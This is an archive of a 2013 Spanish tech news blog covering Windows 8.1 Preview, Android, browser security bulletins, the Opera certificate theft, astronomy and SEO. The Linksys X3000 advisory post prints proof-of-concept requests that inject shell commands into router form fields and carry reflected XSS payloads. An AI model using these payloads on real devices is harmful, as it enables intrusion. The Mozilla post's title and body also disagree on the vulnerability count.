domingo, 30 de junio de 2013

Instalar Windows 8.1 Preview, puede traer graves consecuencias.

Instalar Windows 8.1 Preview, puede traer graves consecuencias.

Windows 8 Preview bugs
 
Entre las cosa negativas que encontré en su momento están:
  • Windows 8.1 Preview tarda casi dos horas en instalarse, y no se puede desinstalar.
  • En las pruebas he sufrido varios bugs serios que desaconsejan instalarlo en equipos de trabajo, al menos de momento.
  • En su momento NVIDIA no había nuevos drivers para Windows 8.1 pero ya se encuentran disponibles mediante Windows Update.
Hace poco comentaba sobre el lanzamiento oficial de Windows 8.1 Preview, después de probarla exhaustivamente durante 24 horas, he sufrido algunos bugs serios y muchas incomodidades que desaconsejan instalar esta versión en equipos de trabajo o en lugares en donde sólo exista un único PC. Además, hay que tener en cuenta que no se puede desinstalar.

La instalación de Windows 8.1 Preview se completó sin incidencias, pero es una operación larga y pesada, que puede llevar fácilmente una o dos horas, incluso en equipos potentes. Microsoft aconseja crear una unidad USB de recuperación, por si algo falla. Después debes descargar un archivo de actualización de 15 MB, que instalas manualmente. Tras el reinicio del equipo, accedes a la Tienda Windows y aquí aparece Windows 8.1 Preview listo para descargar. La descarga ocupa 2,44 GB que bajan lentamente, pero por suerte puedes hacer otras cosas mientras esperas. Al terminar comienza la instalación, reinicios incluidos. Tras completarla, obtendrás Windows 8.1 en tu sistema. Pero aún no hemos terminado. Aunque en las instrucciones no se comenta, es imprescindible arrancar Windows Update para descargar varias actualizaciones adicionales.

Windows 8.1 Preview ofrece lo prometido: el Botón de Inicio, Pantalla de Bloqueo personalizable, nuevas herramientas y funciones... Y también lo que nadie nos contó: unos cuantos bugs.

Al principio los problemas más evidentes derivan de la ausencia de los controladores gráficos adaptados. NVIDIA prometió drivers específicos para Windows 8.1 disponibles en Windows Update el día del estreno, pero 48 horas después aún no estaban listos. Esto provoca que no se pueda acceder al Panel de Control de NVIDIA, así que no puedes controlar el color del escritorio, opciones 3D, etc, ya por suerte están disponibles t por lo menos solvente el inconveniente.

Durante el uso del sistema he sufrido varios bugs que me han obligado a reiniciar: el ratón apunta 10 centímetros más lejos de donde está el cursor, las ventanas no se maximizan, quedándose en mitad de la pantalla, los iconos del escritorio se vuelven inaccesibles, los enlaces directos de la barra de tareas no funcionan...

Microsoft está lanzando actualizaciones y seguramente los nuevos drivers de NVIDIA solucionan la mayoría de estos problemas, pero mi consejo, al menos durante los primeros días, es no instalar Windows 8.1 Preview en equipos de trabajo o si no existen otros equipos alternativos. Tal como he comentado, no se puede desinstalar.

¡Tu decides si quieres asumir el riesgo!

 

sábado, 29 de junio de 2013

Diviértete con tu perfil de Twitter

Diviértete con tu perfil de Twitter29 jun 2013



¿Estás enganchado a Twitter? Si te encanta esta red social y eres un usuario activo y constante, tienes a tu disposición infinidad de aplicaciones divertidas, curiosas y originales con las que sorprender a tus seguidores y disfrutar al máximo de tu cuenta. Un ejemplo interesante es Vizify, un servicio gratuito yonline con el que podrás crear una infografía interactiva con tus publicaciones para mostrar a tus seguidores lo mejor de tu perfil. Crear tu vídeo es muy sencillo y podrás tenerlo en un par de clics: lo único que tienes que hacer es vincular la app con tu cuenta de Twitter y el sistema recogerá de manera automática tus tweets, fotos, vídeos, términos más utilizados, tus horarios de publicación o los followers con los que más interactúas, entre otros datos relevantes. Además, tienes la posibilidad de editar las escenas, eliminando los contenidos automáticos y seleccionando aquellos que más te gusten, y añadir una música de fondo de tu elección, para que la infografía interactiva de Vizify incluya las publicaciones de las que estás más orgulloso y represente de la manera más fiel posible tus actividades en esta red social.

Si quieres volver a leer tus tweets antiguos y recordar momentos memorables, Tweet Tunnel te ofrece la posibilidad de consultarlos cómodamente en un entorno paginado y funcional para que puedas moverte con facilidad por tus publicaciones pasadas. Además, también te permite visualizar el círculo de seguidores con los que más interactúas, así como consultar la lista de tus primeros followers y el ranking con los usuarios que empezaste a seguir al crear tu cuenta.
Obtén datos curiosos sobre tu cuenta


¿De dónde son tus seguidores? Si tienes curiosidad por conocer cuáles son los países de origen de tus followers, con la aplicación gratuita y online Map My Followers podrás descubrir su procedencia de una manera rápida y sencilla. Tan solo tienes vincular la app con tu perfil de Twitter y el sistema te mostrará en el mapa mundial la ubicación de tus seguidores, así como los términos que más emplean en la red social.

Si te apetece conocer tus hábitos de sueño, la app gratuita Sleeping Time te permite crear un gráfico de las horas que duermes a partir de tus publicaciones en Twitter. Una vez que aceptes los permisos para autorizar la sincronización con tu perfil, la aplicación analizará el horario en el que menos twitteas para mostrarte en un reloj el intervalo horario en el que estás normalmente estás dormido.

Si quisieras imprimir tu timeline de Twitter completo, ¿cuánto papel y cuánta tinta se necesitarían? El servicio gratuito y online de The Print Effect analiza tus publicaciones para ofrecerte todo tipo de datos precisos y curiosos, como el número de folios que se necesitarían, los metros cuadrados que ocuparían, su peso o el tiempo que tardaría una impresora tradicional en llevar a cabo la impresión, entre otra información original.

Científicos crean el primer cañón portátil de antimateria

Científicos crean el primer cañón portátil de antimateria



Un equipo de investigadores de laUniversidad de Michigan acaba de publicar un informe en el que detallan cómo han construido un cañón que dispara positrones. Estas partículas de antimateria son el opuesto a los electrones y hasta ahora hacía falta una instalación del tamaño del LHCpara generarlas. El dispositivo de este equipo cabe sobre una mesa.

El cañón de positrones genera estas partículas disparando un láser de alta potencia sobre una cámara de gas helio inerte. Este disparo genera una corriente de electrones que se proyecta sobre una fina lámina de oro. Los electrones desintegran el metal a escala atómica produciendo una corriente de electrones y positrones que se separan mediante campos magnéticos.

El láser que utiliza el cañón es de nada menos que un petavatio (1.000.000.000.000.000 vatios), pero el haz que emite sólo dura 30 femtosegundos (un femtosegundo equivale a 0,000 000 000 000 001 segundos) por lo que su consumo no es 30.000 veces el de toda España sino apenas el de una bombilla. Con todo, tan breve tiempo es suficiente para generar cuatrillones de positrones sin necesidad de aceleradores de partículas de varios kilómetros.

El cañón de antimateria, pese a su nombre, no está pensado como arma, sino como un método más asequible para estudiar estas partículas que sólo se generan de forma natural en eventos cósmicos como los agujeros negros o los pulsar. Eso sí, no nos extrañaría que alguno ya esté pensando en qué pasa si le disparas un láser de positrones a algo. [Physical Review Letters víaPhysOrg]

Foto (con meros propósitos ilustrativos): Los vengadores [Marvel - Disney Pictures]

Gráfico real del proceso: Universidad de Michigan

¿Android 4.3 podría salir en Julio?.

¿Android 4.3 podría salir en Julio?.

Android 43

Google lleva bastante tiempo sin lanzar ninguna actualización de Android y los usuarios de esta plataforma empiezan a impacientarse. La compañía celebró un importante evento en mayo en el que se esperaba conocer las novedades de Android, sin embargo, para sorpresa de los aficionados a esta plataforma, no hubo ninguna pista sobre una nueva versión de Android. Según los rumores de las últimas semanas, la siguiente entrega del sistema operativo del robot verde será Android 4.3 y seguirá manteniendo el sobrenombre “Jelly Bean“. El blog SamMobile ha publicado las que podrían ser las primeras capturas de pantalla de esta versión, que además podría llegar muy pronto.

Android 43 capturas

Samsung lanzó hace unos días una edición Google del Samsung Galaxy S4 en Estados Unidos, es decir, que cuenta con una versión limpia de Android igual que sucede en los dispositivos Nexus. El portal especializado en noticias de la marca coreana habría recibido unas capturas del Galaxy S4 Google funcionando con Android 4.3 Jelly Bean. En la imagen sobre estas líneas vemos el apartado de información del dispositivo, la versión es la 4.3 y el número de compilación es el JWR66N.S005.130625. Por el momento Google no ha hecho oficial Android 4.3, pero se espera que su lanzamiento no se demore demasiado. Desde SamMobile afirman que esta esperada entrega llegará pronto, de hecho aseguran que sus fuentes han confirmado que esta versión llegará al Samsung Galaxy S4 Google Edition en menos de un mes.

Por el momento no hay demasiadas pistas acerca de las novedades que tendrá Android 4.3 Jelly Bean, pero como siempre la rumorología hace sus propias predicciones. Una de las mejoras que podríamos ver en esta entrega es una nueva aplicación para la cámara de fotos que contaría con una interfaz más sencilla y optimizada para dar buenos resultados en fotografías con poca luz.  La nueva entrega del androide verde ofrecería soporte para el sistema Bluetooth Smart, un sistema que permitirá ahorrar energía mientras se usa esta conexión.

También ha habido rumores de que Google podría allanar el terreno para que las actualizaciones lleguen más pronto a todos los dispositivos compatibles. Uno de los mayores problemas de esta plataforma es la fragmentación y los retrasos, a veces exagerados, desde que se lanza una nueva entrega y ésta llega a los móviles y tablets de los distintos fabricantes. Sin embargo acelerar este proceso también depende de las marcas, que son las que deciden qué terminales se actualizarán y cuando lo harán. La llegada de Android 4.3 es inminente según los últimos datos publicados por SamMobile. Esperemos que dentro de poco Google muestre las novedades de la tercera entrega de su serie Jelly Bean y sobre todo que no defraude. La próxima gran actualización prevista será Android 5.0 Key Lime Pie, pero de momento es muy pronto para especular acerca de esta entrega.

viernes, 28 de junio de 2013

Clear Skies, limpia las nubes en las imágenes de Googlge Earth.

Clear Skies, limpia las nubes en las imágenes de Googlge Earth.
 
Para los que usamos Google Earth frecuentemente, cuantas veces nos ha pasado que al querer ver las imágenes de satélite de un sitio, las nubes ocultan casi la totalidad del área impidiendo ver los detalles de la zona. Pues bien, Google lanzó una nueva actualización para su plataforma de visualización de mapas Google Earth y Google Maps. La novedad tiene que ver con despojar a las imágenes de nubes, dejando los cielos despejados por completo, permitiendo una mejor vista del paisaje y todos sus detalles como pueblos, ciudades, etc.

Asimismo, la compañía explicó en su blog que se crearon imágenes con una resolución de 800 mil Mpx, gracias a la recopilación de fotografías de la USGS, Nasa y el satélite Landsat 7.
La actualización Clear Skies ya está disponible para los usuarios en Google Earth y Google Maps.

¿Es Clear Skies 100% efectivo?
Aunque debo decir que si se aprecian los detalles que anteriormente no se apreciaban por las nubes, también debo aclarar que en ocasiones, la calidad de las imágenes no es la más deseada.
En la siguiente imagen, que anteriormente no se podía apreciar mucho por estar cubierta por las nubes, ahora se aprecia todo aunque podrán observar si miran detenidamente que algunas calles están totalmente blancas y otras con el color característico del asfalto. El área donde aparecen las vías color blanco, anteriormente no se podía apreciar y gracias a Clear Skies ahora si se puede pero con la notable perdida de detalles que para muchos no es significativa pero para los profesionales del área si.

Isla de Toas
 
Más información:

¿DirectX 11.2, exclusividad solamente de Windows 8.1 y Xbox One?.

¿DirectX 11.2, exclusividad solamente de Windows 8.1 y Xbox One?.
 
Exclusiva de Windows 8.1 y Xbox One. aunque podría llegar a otras consolas.Así será la revisada API que ya deja de ser conocida como DirectX Blue para llamarse DirectX 11.2, y que mantendrá la compatibilidad con versiones anteriores mediante la emulación por software.

Aunque también es posible que con el tiempo la veamos no solo en otros SO como Windows 7, sino, en “otras consolas Next-Gen” como podría ser PlayStation 4.
Entre sus añadidos, como el MSAA (Multi-Sampling Anti-Aliasing) a 16X para suavizar bordes/dientes de sierra, nos encontramos con el Tiled Resoruces, añadido principal cuya tecnología permite a los desarrolladores trabajar con elementos y recursos de alta resolución dentro de una escena de forma dinámica sin sobrecargar la tarjeta gráfica, como terrenos de alta carga o interfaces de usuario.

También tenemos el Classic DirectX Graphics, opción que mantendrá la compatibilidad con todo tipo de juegos y apps basados en los DirectX anteriores 9 y 10.

¿Que nos ofrecerá Internet Explorer 11?.

¿Que nos ofrecerá Internet Explorer 11?.
 
 
Además del soporte para WebGL y Dash MPEG, Microsoft ha implementado otras mejoras en Internet Explorer 11, en particular bajo la interfaz Modern UI. Mejoras que favorecen la usabilidad de un producto, que si bien ha supuesto un gran cambio respecto de Internet Explorer 9 por el debut de la Interfaz Modern UI, estaba carente de algunas prestaciones que hace tiempo ha implementado la competencia.
Una nueva interfaz para manejar favoritos, pestañas ilimitadas, sincronización entre dispositivos, mayor seguridad, aumento de rendimiento y el rediseño de las herramientas para desarrolladores, ponen el punto de sal a un navegador que se estaba quedando rezagado frente al febril avance de sus más directos rivales.
  • Gestión de favoritos. Uno de los puntos flacos de Internet Explorer 10 Modern UI son los favoritos. Hasta ahora, estos se han tratado en el navegador de una manera algo básica. La posibilidad de anclar un favorito a la pantalla de inicio está bien, pero si tienes muchos es difícil manejarlos. Iconos muy grandes en el propio navegador, y un galimatías importante de favoritos anclados a la pantalla de inicio han hecho que su manejo no sea cómodo. En Internet Explorer 11 se ha mejorado este aspecto, a través de una nueva interfaz a la que se puede acceder desde la barra de la aplicación.
  • Pestañas ilimitadas. Otro aspecto a mejorar de Internet Explorer 10 es la limitación del número de pestañas abiertas, diez como máximo. Internet Explorer 11 no tiene esta limitación, pudiendo tener abiertas todas cuantas queramos.
  • Sincronización entre dispositivos. Internet Explorer 11 incorpora la capacidad de sincronizar entre dispositivos: historial, favoritos, pestañas abiertas y ajustes de sincronización a través de máquinas animadas por Windows 8.1, mediante la cuenta de Microsoft.
  • Seguridad mejorada. Internet Explorer 11 supervisará la extensiones binarias (como ActiveX), antes de su descarga, gracias a un motor antimalware incorporado.
  • Mejor rendimiento. Como el valor en el antiguo servicio militar, se le supone. Microsoft afirma que las páginas van a cargar más rápido y el cambio entre pestañas también mejora en velocidad. No argumenta por qué, pero en principio debería ser así. Cada producto nuevo suele incorporar optimizaciones, en particular en el mundo de los navegadores.
  • Herramientas para desarrolladores. La versión de escritorio de Internet Explorer 11 aporta herramientas para desarrolladores rediseñadas por completo, para ayudar a probar todos los dispositivos, navegadores, e incluso aplicaciones de Windows Store, en palabras Microsoft.
Internet Explorer 11 será compatible con Windows 7 
 
Aunque Internet Explorer 11 haya sido diseñado pensando directamente en Windows 8.1, esto no quiere decir que el nuevo navegador de Microsoft no vaya a funcionar en versiones anteriores del sistema operativo. Si te quedaba alguna duda al respecto, el gigante del software ha confirmado que IE11 podrá ser instalado en Windows 7, pero lamentablemente la información no viene acompañada de una fecha de disponibilidad. Esto nos hace pensar que deberemos tener paciencia para usar el nuevo Explorer en Win7, porque la prioridad seguramente será que funcione correctamente en el último Windows.

Otra noticia relacionada con el navegador tiene que ver con el uso de HTML5, que aunque seguramente suponías que sería soportado, nos asombra ver que el streaming de video funciona usando el protocolo implementado en ese lenguaje. Microsoft ha implementado extensiones de video "Premium" en el software, que incluirá soporte para aceleración de GPU, resolución 1080p, DRM y cifrado sin plugins adicionales.
 
 

jueves, 27 de junio de 2013

Android.Fakedefender, un falso antivirus para Android.

Android.Fakedefender, un falso antivirus para Android.


Los ramsonware son programas informáticos maliciosos que el usuario instala pensando que no lo son y que llegan a bloquear el ordenador a menos que se pague un rescate, ‘ransom’ en inglés. Uno de los engaños más habituales es que se hagan pasar por antivirus, y normalmente es un tipo de ataque que se da en el mundo del PC. Hasta ahoram, porque ya han llegado a Android.

Ha sido la empresa de seguridad Symantec la que ha detectado una versión para Android de esta amenaza a la que se ha bautizado como Android.Fakedefender.

Una vez que la aplicación maliciosa está instalada, la experiencia del usuario varía porque la compatibilidad no exactamente igual en todos los dispositivos. El problema se genera porque no todos los usuarios tiene  la capacidad para desinstalar la aplicación maliciosa porque  esta lo impide, teniendo además la oportunidad de cambiar los ajustes del sistema operativo.

Joji Hamada, experto de seguridad de Symantec, explica en un blog que el malware es particularmente peligroso porque puede llegar a bloquear la opción de restablecimiento completo del dispositivo
En algunos casos, asegura Hamada, los usuarios pueden no ser capaces restablecer completamente el dispositivo y pueden verse forzados a complicar la tare tenido que resetear el producto con una combinación específica de teclas o conectándolo al ordenador para ejecutar un software del fabricante. “Si tienen suerte, algunos usuarios pueden ser capaces de ejecutar una simple tarea de desinstalación debido a que la aplicación puede bloquearse cuando se ejecute debido a problemas de compatibilidad”, escribe el experto de Symantec.
No es un secreto que el malware para Android no para de crecer. Un reciente estudio de F-Secure dice que el número de familias y variantes de amenazas continúa incrementándose, desde los 100 a los 149.

Ya disponible Windows 8.1 Preview.

Ya disponible Windows 8.1 Preview.


La preview de Windows 8.1 ha sido presentada, estando ya disponible para que todos podamos obtenerla e instalarla en nuestros equipos. De este modo, todos los que tengamos interés podemos ponerle las manos encima a Windows 8.1 y conocer el sistema antes de que sea lanzado comercialmente.

No obstante hay que tener en cuenta algunas consideraciones importantes antes de ponernos a la tarea. Podemos actualizar desde Windows 8 a Windows 8.1 Preview sin perder datos, programas ni configuraciones siempre que no cambiemos de idioma (Windows 8.1 Preview está disponible en alemán, árabe, chino simplificado y tradicional, coreano, español, francés, inglés, japonés, portugués, ruso, sueco y turco).

La actualización desde Windows 7 solo permite conservar archivos, y no podemos actualizar desde Vista o XP. Podemos actualizar también un equipo que ejecute Windows RT a Windows RT 8.1, pero no podremos volver atrás, ni siquiera usando las opciones que introdujo Windows 8 para ello. Tampoco en el caso de Windows 8.

Actualizar nuestro equipo a Windows 8.1 Preview es, básicamente, descargar un pequeño ejecutable desde la Web y seguir las instrucciones. Si no podemos actualizar utilizando la Windows Store podemos descargar un archivo ISO que grabar en un USB o un DVD y utilizarlo para instalar Windows 8 desde cero. Para usar la ISO debemos usar el siguiente serial: NTTX3-RV7VB-T7X7F-WQYYY-9Y92F
 
Más información:
 
 

Roban un certificado a Opera y publican una actualización maliciosa para su navegador.

Roban un certificado a Opera y publican una actualización maliciosa  para su navegador.


 
Opera ha anunciado que el pasado 19 de junio sufrió un ataque dirigido sobre su red interna, resultado: robo de un antiguo certificado empleado para firmar código. La compañía reconoce que ha sido usado para firmar malware y que incluso miles de usuarios del navegador (durante un periodo de algo más de media hora) han podido recibir una actualización maliciosa de forma automática.

No es la primera vez que a una importante compañía le roban un certificado digital empleados para la firma de su software, podemos recordar casos como los de Adobe o la compañía antivirus Bit9. Al final el resulto es el mismo, unos atacantes logran firmar malware con un certificado legítimo, lo que puede facilitar su instalación, pasar desapercibido ante algunos antivirus o hacerse pasar por software legítimo sin levantar sospechas. Esto es lo que ha ocurrido recientemente en Opera.

Aunque el aviso de Opera anuncia un impacto limitado, que el ataque fue contenido y sus sistemas revisados, reconocen el robo de un antiguo certificado expirado usado para la firma de código. El portavoz de Opera, Sigbjorn Vik, indicó que el certificado se ha usado para la firma de malware. Actualmente se reconoce la existencia de al menos una muestra de malware firmada con este certificado y que actualmente, la detectan 23 de 47 antivirus. "Esto puede permitirle distribuir software malicioso que aparezca incorrectamente como publicado por Opera Software, o que parezca ser el navegador Opera"

Adicionalmente, alertan de que varios miles de usuarios del navegador Opera en el sistema operativo Microsoft Windows podrían haber sido objeto de una actualización maliciosa de manera automática. El responsable de Opera estima que la ventana de exposición habría sido desde las 01:00 a las 01:36 (entre las 3:00 y la 1:36 hora española) horario UTC del día 19 de junio.

No se aclara en el comunicado si los atacantes llegaron a usar la infraestructura de Opera para liberar la actualización maliciosa, ya que según la ventana de tiempo podría coincidir con el ataque. Otra posibilidad sería que hubiesen comprometido los servidores de nombres de Opera, los cuales se encuentran en su infraestructura, y hubiesen usado un servidor malicioso.

Cabría destacar el hecho de que el ataque haya sido detectado el día 19, al mismo tiempo que la ventana de exposición. Sin embargo este tipo de ataque requiere de cierta complejidad y no sería exagerado pensar que los atacantes podrían haber llevado más tiempo, días tal vez, dentro de su infraestructura.

Opera confirma que liberará una nueva versión del navegador que incluirá un nuevo certificado, por lo que recomiendan encarecidamente que se actualice a la nueva versión tan pronto como esté disponible.

Más información:

Security breach stopped
http://my.opera.com/securitygroup/blog/2013/06/26/opera-infrastructure-attack

8ecbca0de44c82d1c7ffced288aa68c1247bb1255693cd1c5747fb6cef394b43https://www.virustotal.com/en/file/8ecbca0de44c82d1c7ffced288aa68c1247bb1255693cd1c5747fb6cef394b43/analysis/

Mozilla publica boletín de seguridad que corrige 17 vulnerabilidades en Firefox y Thunderbird.

Mozilla publica boletín de seguridad que corrige  17 vulnerabilidades en Firefox y Thunderbird.


Mozilla Foundation Logo
 
Mozilla Foundation ha publicado 14 boletines de seguridad pertenecientes a la nuevas versiones de Mozilla Firefox 22.0 y Thunderbird 17.0.7, en los que corrigen 14 vulnerabilidades. Se agrupan en cuatro boletines de nivel crítico, seis clasificados como alto, tres moderados y uno de nivel bajo.

A continuación resumimos los boletines publicados según su nivel de importancia.

* De nivel Crítico, cuatro boletines con 7 vulnerabilidades que podrían ser aprovechadas por un atacante remoto para ejecutar código arbitrario:

MFSA 2013-53: Existiría un error no especificado en el evento 'onreadystatechange' que podría generar un desbordamiento de memoria (CVE-2013-1690).

MFSA 2013-51: Existe una falta de políticas de seguridad a la hora de controlar las funciones de usuario definidas en los XBL, que permitirían acceder a contenido protegido como los 'System Only Wrappers' (SOW) (CVE-2013-1687).

MFSA 2013-50: Diferentes errores provocados al intentar acceder a objetos en memoria ya liberados, lo que genera un desbordamiento de memoria basado en HEAP (localizados gracias a la utilidad 'Address Sanitizer'). (CVE-2013-1684, CVE-2013-1685 y CVE-2013-1686).

MFSA 2013-49: Diferentes desbordamientos de memoria (CVE-2013-1682 y CVE-2013-1683)

* De nivel Alto: Seis boletines con seis vulnerabilidades que podrían ser aprovechadas por un atacante remoto para ejecutar código arbitrario o elevación de privilegios.

MFSA 2013-62: Elevación de privilegios local a través del servicio 'Mozilla Maintenance Service' de Windows cuando no es accesible el ejecutable principal (CVE-2013-1700).

MFSA 2013-59: Debido a un fallo en las políticas de seguridad de 'XrayWrappers', puede ser evadido para llamar a métodos fuera del contexto de usuario (CVE-2013-1697).

MFSA 2013-56: Salto de restricciones a través de 'PreserveWrapper' (CVE-2013-1694).

MFSA 2013-55: Se podría utilizar el filtro SVG, para revelar información mediante un 'timing attack' (CVE-2013-1693).

MFSA 2013-54: Incorrecta implementación de las especificaciones XHR, al enviarse datos en el cuerpo durante una petición HEAD 'XMLHttpRequest' (CVE-2013-1692). Esto podría ser utilizado por un atacante remoto para realizar un ataque cross-site request forgery (CSRF)

MFSA 2013-52: Ejecución de código a través de la interfaz de la función 'Profiler' (CVE-2013-1688)

* De nivel Moderado, en su mayoría saltos de restricciones:

MFSA 2013-61: Insuficiente política de seguridad en el algoritmo de clasificación de dominios IDN (CVE-2013-1699). Esto podría ser utilizado por un atacante remoto para suplantar dominios oficiales mediante nombres de dominio homógrafos (IDN homograph attack).

MFSA 2013-60: Salto de restricciones a través de 'getUserMedia' (CVE-2013-1698) que permitiría tener acceso a dispositivos del sistema como el micrófono o webcam.

MFSA 2013-58: Salto de restricciones a través de 'X-Frame-Options' durante transacciones de servidor multi-part (CVE-2013-1696) y utilizable en ataques de tipo 'clickjacking'.

* Y finalmente de nivel bajo:

MFSA 2013-57: Salto de restricciones a través de elementos de marco contenidos en 'iframe sandbox' (CVE-2013-1695) Se recomienda actualizar a las versiones disponibles a través de los canales habituales o mediante las actualizaciones automáticas.

Más información:

MFSA 2013-62 Inaccessible updater can lead to local privilege escalation
http://www.mozilla.org/security/announce/2013/mfsa2013-62.html

MFSA 2013-61 Homograph domain spoofing in .com, .net and .namehttp://www.mozilla.org/security/announce/2013/mfsa2013-61.html

MFSA 2013-60 getUserMedia permission dialog incorrectly displays locationhttp://www.mozilla.org/security/announce/2013/mfsa2013-60.html

MFSA 2013-59 XrayWrappers can be bypassed to run user defined methods in
a privileged context
http://www.mozilla.org/security/announce/2013/mfsa2013-59.html

MFSA 2013-58 X-Frame-Options ignored when using server push with
multi-part responses
http://www.mozilla.org/security/announce/2013/mfsa2013-58.html

MFSA 2013-57 Sandbox restrictions not applied to nested frame elementshttp://www.mozilla.org/security/announce/2013/mfsa2013-57.html

MFSA 2013-56 PreserveWrapper has inconsistent behaviorhttp://www.mozilla.org/security/announce/2013/mfsa2013-56.html

MFSA 2013-55 SVG filters can lead to information disclosurehttp://www.mozilla.org/security/announce/2013/mfsa2013-55.html

MFSA 2013-54 Data in the body of XHR HEAD requests leads to CSRF attackshttp://www.mozilla.org/security/announce/2013/mfsa2013-54.html

MFSA 2013-53 Execution of unmapped memory through onreadystatechange eventhttp://www.mozilla.org/security/announce/2013/mfsa2013-53.html

MFSA 2013-52 Arbitrary code execution within Profilerhttp://www.mozilla.org/security/announce/2013/mfsa2013-52.html

MFSA 2013-51 Privileged content access and execution via XBLhttp://www.mozilla.org/security/announce/2013/mfsa2013-51.html

MFSA 2013-50 Memory corruption found using Address Sanitizerhttp://www.mozilla.org/security/announce/2013/mfsa2013-50.html

MFSA 2013-49 Miscellaneous memory safety hazards (rv:22.0 / rv:17.0.7)http://www.mozilla.org/security/announce/2013/mfsa2013-49.html
 

miércoles, 26 de junio de 2013

Múltiples vulnerabilidades en router Linksys X3000.

Múltiples vulnerabilidades en router Linksys X3000.

El investigador de seguridad Michael Messner ha descubierto varios fallos de seguridad en el modelo X3000 de router WiFi de la marca Linksys de Cisco. Estas vulnerabilidades permiten la ejecución de código remoto a través de la inyección de comandos en el sistema operativo subyacente, cross-site scripting y posibilidad de cambiar la contraseña sin preguntar por la contraseña actual.

Inyección de comandos 
Se aprovecha la falta de validación en el contenido suministrado por el usuario en los campos ping_ip y Add_Account_Password. Las siguientes peticiones POST pueden servir como prueba de concepto:

* Parámetro ping_ip de la página Diagnostics.asp: submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=%3b%20ping%20-c%201%20192%2e168%2e1%2e147%20%3b&ping_size=&ping_times=5&traceroute_ip=

* Parámetro Add_Account_Password de la página User_Properties.asp:
command=device_data&cur_ipaddr=192.168.178.188&next_page=StorageAdminUserAdd1.htm&redirect_timer=1&reboot=0&data1=&next_page=&submit_button=User_Properties&submit_type=create_user&change_action=gozila_cgi&Add_Account_Group_Name=&access_group_name=&delete_groups=&Modify_Account_Name=&Add_Account_Name=pwnd&full_name=pwnd&user_desc=pwnd&Add_Account_Password=`ping%20192%2e168%2e178%2e103`&Add_Account_PasswordConfirm=pwnd&Add_Account_Group=admin

Con estas peticiones conseguimos ejecutar en el sistema el comando ping.

XSS no persistente

También falta de validación en los parámetros ping_ip, sortby y submit_button.

* Parámetro ping_ip de la página Diagnostics.asp: submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=1.1.1.1'><script>alert(1)</script>&ping_size=32&ping_times=5&traceroute_ip=

* Parámetro sortby de la página DHCPTable.asp: submit_button=DHCPTable&change_action=&submit_type=&small_screen=&ip=&mac=&if_name=&nowait=1&sortby=mac"%3balert(1)//

* Parámetro submit_button de la página WanMAC.asp: submit_button=WanMAC'%3balert(1)//&change_action=&submit_type=&action=Apply&wait_time=3&mac_clone_enable=0

Estas vulnerabilidades han sido solucionas en el firmware v1.0.05 build 002 Feb 21,2013

Más información:

Linksys X3000 - Multiple Vulnerabilities
http://www.s3cur1ty.de/m1adv2013-019

Wireless-N ADSL 2+ Modem Router (X3000)http://support.linksys.com/en-eu/support/linksys/X3000

Una estrella cercana al Sol tiene seis planetas, tres de ellos en la zona habitable

Una estrella cercana al Sol tiene seis planetas, tres de ellos en la zona habitable
El astro, con poco más de un tercio de la masa solar, forma parte de un sistema triple situado a 22 años luz de la Tierra




Alrededor de la estrella Gliese 667C giran al menos seis planetas (que pueden ser siete) y tres de ellos están en lo que los científicos denominan zona habitable porque en ella los planetas podrían tener agua en estado líquido. Dos más están más cerca del astro y otro más lejos de esa franja. Además, los tres de la zona habitable son supertierras, es decir, planetas más masivos que la Tierra, pero menos que los gigantes Saturno o Neptuno. Es la primera vez que se encuentran tres planetas en esa franja de habitabilidad de una misma estrella, explican los investigadores. Como Gliese 667C forma parte de un sistema estelar triple, en el cielo allí lucen tres, y la noche estará iluminada tanto como aquí con Luna llena. El conjunto está a 22 años luz de la Tierra, en la constelación de Escorpio, lo que se considera, en términos galácticos, el vecindario solar, explica el Observatorio Europeo Austral (ESO).

Gliese 667C, con una masa de poco más de un tercio de la solar, es una vieja conocida de los cazadores de planetas extrasolares. En torno a ella se habían identificado ya al menos tres cuerpos en órbita (uno de ellos en la zona habitable). Pero Guillem Anglada-Escudé (Universidad de Gotinga, Alemania) y sus colegas decidieron volver a observarla y dar otra vuelta a las imágenes y a la información de estudios anteriores almacenadas en las bases de datos, incluidas las de grandes telescopios como VLT del ESo (en Chile), Keck y Magellan, estos dos últimos en Hawai y Chile, respectivamente. Así han descubierto los planetas nuevos y presentan su investigación en la revista Astronomy and Astrophysics. Toda la franja de habitabilidad, en el caso de esta estrella, está dentro de una órbita como la de Mercurio en torno al Sol.

La elección de un astro como Gliese 667C responde a una estrategia concreta de búsqueda de supertierras en zona habitable. Se han encontrado planetas de este tipo en órbita de estrellas similares a la nuestra, pero muchos de ellos no tendrían agua en estado líquido al estar demasiado cerca del astro, como Mercurio al Sol o más próximos aún. Sin embargo, en torno a estrellas más tenues y más frías, los planetas, aunque orbiten muy cerca de ellas, pueden aún ser candidatos a habitabilidad y Gliese 667C es el primer ejemplo de un sistema así: un astro de baja masa con varios planetas en la zona habitable, explican los expertos de la Institución Carnegieestadounidense que han participado en esta investigación. El 80% de las estrellas de la Vía Láctea, muchas en las cercanías de la Tierra, caen precisamente en el rango de baja masa.

“El número de planetas potencialmente habitables en nuestra galaxia va a ser mucho mayor si contamos con encontrar varios de ellos alrededor de cada estrella de baja masa, en lugar de buscar en diez estrellas con un planeta cada una”, explica Rory Barnes (Universidad de Washington), miembro del equipo, en un comunicado del ESO.

martes, 25 de junio de 2013

Como aumentar las visitas a nuestro blog

Como aumentar las visitas a nuestro blog
Martes, octubre 11th, 2011 , hora 21:40

Cuando comenzamos un negocio en internet, necesitamos dirigir el tráfico a nuestro sitio web o blog, para aumentar el número de los visitantes que entran en nuestra página y así conseguir un mayor número de ventas.

Para lograrlo hay una gran cantidad de estrategias que nos ayudan a conseguir el objetivo de aumentar nuestro ingresos.

Aquí veremos algunas de las formas más poderosas para generar tráfico a nuestro sitio web.

Optimización de nuestra web

La optimización de nuestra web significa que debemos utilizar las técnicas de SEO (search engine optimization), optimización de los motores de búsqueda.

La optimización no nos aumentará el tráfico de forma directa, pero sí indirectamente al aumentar nuestro ranking y así posicionarnos en las primeras páginas de los buscadores.

La optimización contempla dos aspectos:



La optimización interna debe incluir en los “meta códigos” la o las palabras claves para las cuales quieres posicionar tu página web (título, descripción y palabras claves), además debes incluirlas en las etiquetas de título H1, H2 y H3, y finalmente incluir esas palabras clave en el contenido interno de esa página web.

